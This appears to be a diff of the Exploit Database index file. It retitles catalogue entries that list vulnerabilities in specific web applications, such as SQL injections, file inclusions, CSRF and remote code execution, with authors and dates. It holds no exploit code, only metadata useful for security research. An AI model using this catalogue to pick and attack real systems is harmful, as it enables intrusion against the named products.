Team",php,webapps,80 @@ -36554,7 +36565,7 @@ id,file,description,date,author,platform,type,port 38769,platforms/php/webapps/38769.txt,"Monstra CMS - 'login' Parameter SQL Injection",2013-09-20,linc0ln.dll,php,webapps,0 38770,platforms/php/webapps/38770.txt,"MentalJS - Sandbox Security Bypass",2013-09-20,"Rafay Baloch",php,webapps,0 38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0 -38781,platforms/php/webapps/38781.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injection",2013-10-02,"Yu-Chi Ding",php,webapps,0 +38781,platforms/php/webapps/38781.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injections",2013-10-02,"Yu-Chi Ding",php,webapps,0 38803,platforms/php/webapps/38803.txt,"WordPress Plugin WP-Client 3.8.7 - Persistent Cross-Site Scripting",2015-11-24,"Pier-Luc Maltais",php,webapps,80 38782,platforms/php/webapps/38782.php,"WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 @@ -36594,8 +36605,8 @@ id,file,description,date,author,platform,type,port 38856,platforms/php/webapps/38856.txt,"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38861,platforms/php/webapps/38861.txt,"WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0 -38863,platforms/php/webapps/38863.php,"NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 -38864,platforms/php/webapps/38864.php,"NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0 +38863,platforms/php/webapps/38863.php,"NeoBill - '/modules/nullregistrar/PHPwhois/example.php' 'query' Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 +38864,platforms/php/webapps/38864.php,"NeoBill - '/install/include/solidstate.php' Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0 38865,platforms/php/webapps/38865.txt,"NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80 38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 @@ -36606,14 +36617,14 @@ id,file,description,date,author,platform,type,port 38873,platforms/php/webapps/38873.txt,"eduTrac - 'showmask' Parameter Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps,0 38874,platforms/php/webapps/38874.txt,"BoastMachine - 'blog' Parameter SQL Injection",2013-12-13,"Omar Kurt",php,webapps,0 38875,platforms/php/webapps/38875.php,"osCMax - Arbitrary File Upload / Full Path Information Disclosure",2013-12-09,KedAns-Dz,php,webapps,0 -38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 - /auction/asp/list.asp pa Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0 -38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator - /auction/casp/Admin.asp SQL Injection Admin Authentication Bypass",2013-12-16,R3d-D3V!L,php,webapps,0 +38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp' 'pa' Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0 +38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator - '/auction/casp/Admin.asp' SQL Injection (Admin Authentication Bypass)",2013-12-16,R3d-D3V!L,php,webapps,0 38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator - Multiple SQL Injections",2013-12-14,R3d-D3V!L,asp,webapps,0 38880,platforms/php/webapps/38880.txt,"Veno File Manager - 'q' Parameter Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 38881,platforms/php/webapps/38881.html,"Piwigo - admin.php Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,php,webapps,0 38882,platforms/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 -38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 +38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injections / Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - 'checktransferstatus.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - 'additionalsettings.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 @@ -36650,21 +36661,21 @@ id,file,description,date,author,platform,type,port 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0 38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall - Directory Traversal",2013-10-03,"Sisco Barrera",php,webapps,0 38943,platforms/php/webapps/38943.txt,"Joomla! Component 'com_aclsfgpl' - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0 -38944,platforms/php/webapps/38944.txt,"Command School Student Management System - /sw/admin_grades.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38945,platforms/php/webapps/38945.txt,"Command School Student Management System - /sw/admin_terms.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38946,platforms/php/webapps/38946.txt,"Command School Student Management System - /sw/admin_school_years.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38947,platforms/php/webapps/38947.txt,"Command School Student Management System - /sw/admin_sgrades.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38948,platforms/php/webapps/38948.txt,"Command School Student Management System - /sw/admin_media_codes_1.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38949,platforms/php/webapps/38949.txt,"Command School Student Management System - /sw/admin_infraction_codes.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38950,platforms/php/webapps/38950.txt,"Command School Student Management System - /sw/admin_generations.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38951,platforms/php/webapps/38951.txt,"Command School Student Management System - /sw/admin_relations.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38952,platforms/php/webapps/38952.txt,"Command School Student Management System - /sw/admin_titles.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38953,platforms/php/webapps/38953.txt,"Command School Student Management System - /sw/health_allergies.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38954,platforms/php/webapps/38954.txt,"Command School Student Management System - /sw/admin_school_names.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38955,platforms/php/webapps/38955.txt,"Command School Student Management System - /sw/admin_subjects.php id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38956,platforms/php/webapps/38956.txt,"Command School Student Management System - /sw/backup/backup_ray2.php Database Backup Direct Request Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38957,platforms/php/webapps/38957.html,"Command School Student Management System - /sw/Admin_change_Password.php Cross-Site Request Forgery (Admin Password Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38958,platforms/php/webapps/38958.html,"Command School Student Management System - /sw/add_topic.php Cross-Site Request Forgery (Topic Creation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38944,platforms/php/webapps/38944.txt,"Command School Student Management System - '/sw/admin_grades.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38945,platforms/php/webapps/38945.txt,"Command School Student Management System - '/sw/admin_terms.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38946,platforms/php/webapps/38946.txt,"Command School Student Management System - '/sw/admin_school_years.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38947,platforms/php/webapps/38947.txt,"Command School Student Management System - '/sw/admin_sgrades.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38948,platforms/php/webapps/38948.txt,"Command School Student Management System - '/sw/admin_media_codes_1.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38949,platforms/php/webapps/38949.txt,"Command School Student Management System - '/sw/admin_infraction_codes.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38950,platforms/php/webapps/38950.txt,"Command School Student Management System - '/sw/admin_generations.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38951,platforms/php/webapps/38951.txt,"Command School Student Management System - '/sw/admin_relations.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38952,platforms/php/webapps/38952.txt,"Command School Student Management System - '/sw/admin_titles.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38953,platforms/php/webapps/38953.txt,"Command School Student Management System - '/sw/health_allergies.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38954,platforms/php/webapps/38954.txt,"Command School Student Management System - '/sw/admin_school_names.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38955,platforms/php/webapps/38955.txt,"Command School Student Management System - '/sw/admin_subjects.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38956,platforms/php/webapps/38956.txt,"Command School Student Management System - '/sw/backup/backup_ray2.php' Database Backup Direct Request Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38957,platforms/php/webapps/38957.html,"Command School Student Management System - '/sw/Admin_change_Password.php' Cross-Site Request Forgery (Admin Password Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38958,platforms/php/webapps/38958.html,"Command School Student Management System - '/sw/add_topic.php' Cross-Site Request Forgery (Topic Creation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38965,platforms/php/webapps/38965.txt,"ECommerceMajor - productdtl.php (prodid) SQL Injection",2015-12-14,"Rahul Pratap Singh",php,webapps,80 38966,platforms/php/webapps/38966.txt,"WordPress Plugin Admin Management Xtended 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 39096,platforms/php/webapps/39096.txt,"i-doit Pro - 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 @@ -36676,23 +36687,23 @@ id,file,description,date,author,platform,type,port 38977,platforms/php/webapps/38977.py,"Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,webapps,0 38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 38984,platforms/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80 -38985,platforms/php/webapps/38985.txt,"Dredge School Administration System - /DSM/loader.php Id Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38986,platforms/php/webapps/38986.txt,"Dredge School Administration System - /DSM/loader.php Account Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38987,platforms/php/webapps/38987.html,"Dredge School Administration System - /DSM/loader.php Cross-Site Request Forgery (Admin Account Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38988,platforms/php/webapps/38988.txt,"Dredge School Administration System - /DSM/Backup/processbackup.php Database Backup Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38985,platforms/php/webapps/38985.txt,"Dredge School Administration System - '/DSM/loader.php' 'Id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38986,platforms/php/webapps/38986.txt,"Dredge School Administration System - '/DSM/loader.php' Account Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38987,platforms/php/webapps/38987.html,"Dredge School Administration System - '/DSM/loader.php' Cross-Site Request Forgery (Admin Account Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38988,platforms/php/webapps/38988.txt,"Dredge School Administration System - '/DSM/Backup/processbackup.php' Database Backup Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 38991,platforms/php/webapps/38991.pl,"Ovidentia NewsLetter Module 2.2 - 'admin.php' Remote File Inclusion",2015-12-16,bd0rk,php,webapps,80 -39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script - /products.php Multiple Parameter SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 -39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script - /news.php id Parameter SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 +39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script - '/products.php' Multiple Parameter SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 +39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script - '/news.php' 'id' Parameter SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 39014,platforms/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross-Site Request Forgery",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server - Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps,0 39016,platforms/php/webapps/39016.txt,"Joomla! Component Almond Classifieds - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps,0 39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80 39028,platforms/php/webapps/39028.txt,"Joomla! Component Sexy polling 1.0.8 - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 -39029,platforms/php/webapps/39029.txt,"BloofoxCMS - /bloofox/index.php 'Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39030,platforms/php/webapps/39030.txt,"BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39031,platforms/php/webapps/39031.html,"BloofoxCMS - /admin/index.php Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39029,platforms/php/webapps/39029.txt,"BloofoxCMS - '/bloofox/index.php' 'Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39030,platforms/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php' 'Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39031,platforms/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 39032,platforms/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 39033,platforms/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,php,webapps,80 @@ -36729,8 +36740,8 @@ id,file,description,date,author,platform,type,port 39109,platforms/php/webapps/39109.txt,"WordPress Plugin Relevanssi - 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 39110,platforms/php/webapps/39110.txt,"Cory Jobs Search - 'cid' Parameter SQL Injection",2014-03-05,Slotleet,php,webapps,0 39111,platforms/php/webapps/39111.php,"WordPress Plugin Premium Gallery Manager - Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 -39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store - 'id' Parameter Multiple SQL Injection",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 -39116,platforms/php/webapps/39116.txt,"GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injection",2014-03-19,"Claepo Wang",php,webapps,0 +39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store - 'id' Parameter Multiple SQL Injections",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 +39116,platforms/php/webapps/39116.txt,"GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injections",2014-03-19,"Claepo Wang",php,webapps,0 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 39118,platforms/php/webapps/39118.html,"osCMax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 39124,platforms/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 @@ -36747,8 +36758,8 @@ id,file,description,date,author,platform,type,port 39139,platforms/php/webapps/39139.txt,"PHPFox - Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0 39140,platforms/php/webapps/39140.txt,"Joomla! Component Inneradmission - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0 39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0 -39142,platforms/jsp/webapps/39142.txt,"Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 -39143,platforms/jsp/webapps/39143.txt,"Xangati - /servlet/Installer file Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39142,platforms/jsp/webapps/39142.txt,"Xangati - '/servlet/MGConfigData' Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39143,platforms/jsp/webapps/39143.txt,"Xangati - '/servlet/Installer' 'file' Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0 39150,platforms/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0 @@ -36760,8 +36771,8 @@ id,file,description,date,author,platform,type,port 39170,platforms/xml/webapps/39170.txt,"Atlassian Confluence 5.2 / 5.8.14 / 5.8.15 - Multiple Vulnerabilities",2016-01-05,"Sebastian Perez",xml,webapps,0 39171,platforms/php/webapps/39171.txt,"PHPIPAM 1.1.010 - Multiple Vulnerabilities",2016-01-05,"Mickael Dorigny",php,webapps,0 39172,platforms/php/webapps/39172.txt,"PrestaShop - getSimilarManufacturer.php id_manufacturer Parameter SQL Injection",2014-05-05,indoushka,php,webapps,0 -39173,platforms/php/webapps/39173.txt,"Caldera - /costview2/jobs.php tr Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 -39174,platforms/php/webapps/39174.txt,"Caldera - /costview2/printers.php tr Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 +39173,platforms/php/webapps/39173.txt,"Caldera - '/costview2/jobs.php' 'tr' Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 +39174,platforms/php/webapps/39174.txt,"Caldera - '/costview2/printers.php' 'tr' Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 39176,platforms/php/webapps/39176.html,"TOA - Cross-Site Request Forgery",2014-05-08,"High-Tech Bridge",php,webapps,0 39178,platforms/php/webapps/39178.txt,"CMS Touch - pages.php Page_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 39179,platforms/php/webapps/39179.txt,"CMS Touch - 'news.php' News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 @@ -36791,7 +36802,7 @@ id,file,description,date,author,platform,type,port 39237,platforms/php/webapps/39237.txt,"WordPress Plugin NextGEN Gallery 1.9.1 - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0 39238,platforms/php/webapps/39238.txt,"AtomCMS - SQL Injection / Arbitrary File Upload",2014-07-07,"Jagriti Sahu",php,webapps,0 39239,platforms/php/webapps/39239.txt,"xClassified - 'ads.php' SQL Injection",2014-07-07,Lazmania61,php,webapps,0 -39240,platforms/php/webapps/39240.txt,"WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injection",2014-07-09,"Claudio Viviani",php,webapps,0 +39240,platforms/php/webapps/39240.txt,"WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injections",2014-07-09,"Claudio Viviani",php,webapps,0 39241,platforms/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,java,webapps,4848 39243,platforms/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80 39245,platforms/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 @@ -36849,10 +36860,10 @@ id,file,description,date,author,platform,type,port 39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80 39341,platforms/php/webapps/39341.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 39342,platforms/php/webapps/39342.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 -39343,platforms/php/webapps/39343.txt,"ol-commerce - /OL-Commerce/affiliate_signup.php a_country Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39344,platforms/php/webapps/39344.txt,"ol-commerce - /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39345,platforms/php/webapps/39345.txt,"ol-commerce - /OL-Commerce/create_account.php country Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39346,platforms/php/webapps/39346.txt,"ol-commerce - /OL-Commerce/admin/create_account.php entry_country_id Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39343,platforms/php/webapps/39343.txt,"OL-Commerce - '/OL-Commerce/affiliate_signup.php' 'a_country' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39344,platforms/php/webapps/39344.txt,"OL-Commerce - '/OL-Commerce/affiliate_show_banner.php' 'affiliate_banner_id' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39345,platforms/php/webapps/39345.txt,"OL-Commerce - '/OL-Commerce/create_account.php' 'country' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39346,platforms/php/webapps/39346.txt,"OL-Commerce - '/OL-Commerce/admin/create_account.php' 'entry_country_id' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39347,platforms/php/webapps/39347.txt,"Fonality trixbox - 'endpoint_generic.php' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39348,platforms/php/webapps/39348.txt,"Fonality trixbox - 'index.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39349,platforms/php/webapps/39349.txt,"Fonality trixbox - 'asterisk_info.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -37179,7 +37190,7 @@ id,file,description,date,author,platform,type,port 40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Code Execution",2016-08-06,LiquidWorm,php,webapps,80 40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin)",2016-08-06,LiquidWorm,php,webapps,80 40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80 -40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80 +40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections",2016-08-06,LiquidWorm,php,webapps,80 40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Code Execution (Shellshock)",2016-08-06,LiquidWorm,cgi,webapps,80 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80 @@ -37537,7 +37548,7 @@ id,file,description,date,author,platform,type,port 41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0 41199,platforms/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0 -41205,platforms/hardware/webapps/41205.py,"Multiple Netgear Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",hardware,webapps,0 +41205,platforms/hardware/webapps/41205.py,"Multiple NETGEAR Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",hardware,webapps,0 41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 @@ -37998,7 +38009,7 @@ id,file,description,date,author,platform,type,port 42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 -42068,platforms/multiple/webapps/42068.html,"WebKit - Stealing Variables via Page Navigation in FrameLoader::clear",2017-05-25,"Google Security Research",multiple,webapps,0 +42068,platforms/multiple/webapps/42068.html,"WebKit - Stealing Variables via Page Navigation in 'FrameLoader::clear'",2017-05-25,"Google Security Research",multiple,webapps,0 42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 